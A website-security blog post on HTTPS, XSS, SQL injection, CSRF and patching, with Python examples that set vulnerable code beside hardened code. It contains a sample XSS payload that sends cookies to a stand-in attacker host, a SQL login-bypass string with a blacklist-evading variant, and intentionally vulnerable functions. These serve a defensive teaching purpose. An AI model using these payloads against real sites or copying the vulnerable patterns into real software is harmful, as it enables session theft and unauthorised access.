5 Website Security Checks: Are you at risk?
October is Security Month here at Server Density, and to mark the occasion we’ve partnered with our friends at Detectify to create a short series of security dispatches for you.
As we’ve written before, humans are the weakest link when it comes to safe systems, and there are a number of best practices that help us mitigate that risk. In this series, however, we will focus purely on technology.
Website Security Checks
According to the 2015 WhiteHat Security Statistics Report, an overwhelming majority of websites suffered from at least one serious vulnerability. Even when those vulnerabilities were addressed, their time-to-fix was unacceptably long. A great number of website owners are not aware of—let alone equipped to deal with—online security threats.
What follows is a collection of website security checks you can start with. It covers a number of known threats you need to prepare for, and secure your website against.
1. Lack of HTTPS
Plain HTTP is neither encrypted nor authenticated, so anyone on the network path (a compromised Wi-Fi hotspot, an ISP, a rogue proxy) can read and modify traffic in transit. That is what makes a man-in-the-middle attack possible, and it places user credentials, session cookies and any other sensitive data at risk.
DigitalOcean have written a great set of instructions on how to acquire and install a TLS certificate (still widely called an SSL certificate), and you can read our suggestions here. Certificates are inexpensive and can be issued within minutes. Once HTTPS is in place, redirect every HTTP request to it and send an HSTS header so browsers never fall back to plain HTTP; if you are an experienced sysadmin you can also harden the configuration by disabling obsolete protocol versions and weak cipher suites.
2. Cross-Site Scripting
XSS is the most frequently occurring security threat in web applications. It arises when user-controlled input is written into a page without being encoded for the context it lands in, so an attacker's script runs in other users' browsers with the full privileges of your site's origin (reading session cookies, submitting forms as the victim). A stored XSS payload, such as one saved in a comment, affects every subsequent visitor to that page; a reflected one affects whoever follows a crafted link.
Modern frameworks do a fairly good job at preventing XSS because their template engines encode output by default. This means legacy applications, and any code that bypasses the template engine to build HTML by hand, are the ones most exposed to this risk. Where you must accept rich HTML from users, sanitise it with a library like DOMPurify rather than writing your own filter; everywhere else, encode output for the context it is inserted into. OWASP offers comprehensive instructions on how to deal with XSS.
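The difference between interpolating raw input and encoding it for its context, as an added Python example (not code from the original post, Server Density or Detectify). The comment and search strings are constructed attacker inputs, and the two "render" functions are stand-ins for hand-built HTML in a legacy application:

```python
import html

# Constructed sample input: a comment an attacker submits to a blog's comment form.
ATTACKER_COMMENT = (
    '<script>new Image().src="http://evil.example/?c="+document.cookie</script>'
)

# Constructed sample input aimed at an attribute value rather than element content.
ATTRIBUTE_BREAKOUT = '" onmouseover="alert(document.cookie)'


def render_comment_unsafe(comment: str) -> str:
    """Vulnerable: interpolates user input straight into the HTML.

    Whatever the attacker wrote becomes part of the page's markup and runs
    in every subsequent visitor's browser (stored XSS).
    """
    return f'<li class="comment">{comment}</li>'


def render_comment_safe(comment: str) -> str:
    """Hardened: encode for the element-content context before interpolating.

    html.escape turns < > & " ' into entities, so the browser displays the
    attacker's text literally instead of parsing it as a tag.
    """
    return f'<li class="comment">{html.escape(comment, quote=True)}</li>'


def render_search_box_unsafe(value: str) -> str:
    """Vulnerable attribute context: a double quote in the input closes the
    value attribute and lets the attacker add an event-handler attribute."""
    return f'<input name="q" value="{value}">'


def render_search_box_safe(value: str) -> str:
    """Hardened attribute context: quote the attribute AND encode quotes in the value."""
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


def has_live_markup(rendered: str) -> bool:
    """Crude check used only to demonstrate the difference: does the output
    still contain a raw <script> tag or an injected onmouseover attribute?"""
    lowered = rendered.lower()
    return "<script" in lowered or ' onmouseover="' in lowered
```

`html.escape` is the right encoding for element content and quoted attribute values only. Input that ends up inside a `<script>` block, a URL (`javascript:` schemes), or a style declaration needs an encoding specific to that context, and input that must keep some HTML needs a sanitiser such as DOMPurify rather than escaping.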
3. SQL Injection
This is a critical vulnerability in the application code that builds database queries, not in the database server itself. Attackers exploit any input that ends up concatenated into a query (e.g. username and password fields, search boxes, URL parameters) to tamper with the SQL and break into the backend database of a website. This opens the possibility of data exfiltration, authentication bypass and, on some database servers, remote code execution.
While it may not be as prevalent as it used to be, some very high profile leaks (Bell Canada, Wall Street Journal, SAP among others) happened through SQL injection attacks. Check Point recently compiled a list of SQL injection trends.
Parameterized queries (prepared statements) are the primary defence: the SQL text is sent to the database separately from the values, so the database never parses user data as SQL code. Stored procedures help only if they are called with parameters and do not build dynamic SQL internally.
Web Application Firewalls (WAFs) can further reduce the risk of SQL injection by matching requests against blacklists of known attack patterns using regular expressions or similar techniques. This blocks most automated scanners (bots) and provides some low-hanging-fruit protection against opportunistic attacks. Targeted attacks, however, will probably bypass these filters with encoding tricks or simple rewrites of the payload, so treat a WAF as defence in depth rather than a fix.
Finally, an ORM layer may help with SQL injection because it parameterizes queries for you and removes the need (or opportunity) to write SQL by hand. The raw-query escape hatches every ORM provides are still injectable, so review those as you would any hand-written SQL. The extra layer between code and database also carries a CPU overhead, and ORMs are known to generate complex and unoptimized SQL queries.
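The two points above, parameterization and the limits of a blacklist, in one added Python example (not code from the original post, Server Density, Detectify or Check Point). It uses an in-memory SQLite table constructed for the example, a login function written both ways, and a deliberately narrow regular expression standing in for a WAF rule; the payload strings are constructed as well:

```python
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table standing in for a site's backend database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute(
        "INSERT INTO users (username, password) VALUES ('alice', 'correct horse')"
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Vulnerable: the query is assembled by string concatenation, so the
    database cannot tell where the developer's SQL ends and the user's data begins.
    A password of  x' OR '1'='1  turns the WHERE clause into a tautology."""
    query = (
        "SELECT id FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone()


def login_parameterized(conn: sqlite3.Connection, username: str, password: str):
    """Hardened: placeholders ship the SQL text and the values separately;
    the values are never parsed as SQL, whatever they contain."""
    query = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()


# Toy stand-in for a WAF blacklist rule, constructed for this example. It
# matches the textbook payload but is case-sensitive, while SQL keywords are
# not, so a trivially rewritten payload slips past it.
NAIVE_BLACKLIST = re.compile(r"'\s*OR\s*'1'\s*=\s*'1")


def waf_blocks(value: str) -> bool:
    """Return True if the naive blacklist rule would reject this input."""
    return bool(NAIVE_BLACKLIST.search(value))


def attempt(conn: sqlite3.Connection, username: str, password: str, use_params: bool):
    """Run one login attempt through the toy WAF and the chosen query style.
    Returns 'blocked', the matched row, or None when no row matched."""
    if waf_blocks(username) or waf_blocks(password):
        return "blocked"
    fn = login_parameterized if use_params else login_vulnerable
    return fn(conn, username, password)
```

With the concatenated query, `x' OR '1'='1` as the password logs in as the first user without knowing any credentials, and the same payload with `oR` instead of `OR` walks past the blacklist and still works. The parameterized version returns no row for either payload: the database compares the literal string against the stored password, exactly as the paragraph on parameterized queries describes.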
4. Cross-Site Request Forgery
A CSRF attack forces a user's web browser to perform an unwanted action on a site the user is authenticated to. Because the browser attaches the session cookie to every request for that site, a form or script on an attacker's page can submit a state-changing request that the server cannot distinguish from a legitimate one. Any endpoint that changes state on the strength of the cookie alone, without some proof that the request originated from your own pages, is at risk.
You can prevent such vulnerabilities by applying CSRF tokens to forms that undertake authenticated actions (such as updating a user profile or a password change): the server embeds an unpredictable token tied to the user's session in each form and rejects any submission that does not carry it back, which an attacker's page cannot do because it cannot read the token. All modern frameworks have built-in CSRF protection; make sure it is switched on for every state-changing route, and never let GET requests change state.
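A session-bound CSRF token minted and verified with an HMAC, as an added Python example (not code from the original post or from any framework). The `handle_password_change` function and the `request` dictionary it takes are hypothetical stand-ins for a framework's handler and request object; the session id and form fields are constructed:

```python
import hashlib
import hmac
import secrets

# Server-side secret used to mint and check tokens. Generated at import time
# here for the example; a real deployment stores it in configuration so that
# tokens survive restarts and are shared across workers.
SERVER_SECRET = secrets.token_bytes(32)


def issue_csrf_token(session_id: str, secret: bytes = SERVER_SECRET) -> str:
    """Mint a token bound to this session: a random nonce plus an HMAC over
    session id and nonce. Only the server can produce a valid MAC, and the
    token only verifies for the session it was issued for."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str, secret: bytes = SERVER_SECRET) -> bool:
    """Recompute the MAC for this session and compare in constant time."""
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    expected = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac.encode(), expected.encode())


def handle_password_change(request: dict) -> str:
    """Hypothetical handler for POST /change-password.

    `request` is a constructed stand-in for the framework's request object:
    {"cookies": {...}, "form": {...}}. The browser attaches the session cookie
    automatically, even to a request started from an attacker's page, which is
    exactly why the cookie alone must not authorise the change."""
    session_id = request["cookies"].get("session")
    if session_id is None:
        return "401 not logged in"
    if not verify_csrf_token(session_id, request["form"].get("csrf_token", "")):
        return "403 CSRF check failed"
    return "200 password changed"
```

A forged request from another origin carries the victim's cookie but not the token, because the attacker's page cannot read your form, so it fails the check; a token lifted from one session does not verify for another. Setting `SameSite=Lax` or `Strict` on the session cookie is a worthwhile second layer, but the token check is the one that does not depend on browser support.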
5. Outdated Software
Updating your software is one of the most straightforward ways to protect your website and your users. A single unpatched vulnerability may be all it takes for an attacker to compromise your server. This applies to the whole stack: operating system, web server, language runtime and application dependencies. If you run WordPress, make sure the core, themes and plugins are entirely up to date.
Upgrading to the latest bug-fixed versions of all your software should be a scheduled recurring activity.
In our next security dispatch we will look at some of the top API security checks you need to be aware of. To make sure you don’t miss a beat, sign up here. You should also read the other articles from our security month, including the API security holes you should be considering, and how to secure your servers.